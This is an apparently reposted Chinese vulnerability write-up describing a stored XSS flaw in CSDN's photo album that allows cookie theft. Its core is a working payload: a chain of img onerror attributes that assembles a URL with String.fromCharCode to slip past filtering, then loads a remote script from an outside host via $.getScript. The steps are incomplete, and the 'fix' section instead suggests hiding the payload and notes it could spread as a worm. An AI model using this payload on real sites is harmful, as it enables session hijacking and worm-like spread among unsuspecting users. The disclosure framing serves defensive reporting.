来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] CSDN某处过滤用户输入不周全,只防止了一种漏洞的产生,导致xss,可打cookie。话说我继续在CSDN空间挖洞,然后看到了相册这一功能,有没有什么漏洞呢?0、试着上传了一张图片。1、在...
CSDN某处过滤用户输入不周全,只防止了一种漏洞的产生,导致xss,可打cookie。
0、试着上传了一张图片。
6、构造N条语句均失败后,回到相册,看了看源码,这些输出非常有规律,很整齐;
<img src=1 onerror="mkx='http:'"> <img src=1 onerror="ac=String.fromCharCode"> <img src=1 onerror="mkx+=ac(47)+ac(47)"> <img src=1 onerror="mkx+='mikuxss'"> <img src=1 onerror="mkx+='.sinaapp'"> <img src=1 onerror="mkx+='.com'"> <img src=1 onerror="mkx+=ac(47)"> <img src=1 onerror="mkx+='12CmMi'"> <img src=1 onerror="ac=$.getScript"> <img src=1 onerror="ac(mkx)">
8、效果图(http://my.csdn.net/u011311506/album/show/179805)
(那个,图是测试用的,这个洞和V家没有关系。。。)
修复方案: img标签里完全可以插入style="display:none"增加迷惑性 邀请别人看自己相册是很正常的请求,此洞也可蠕虫化,望重视 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com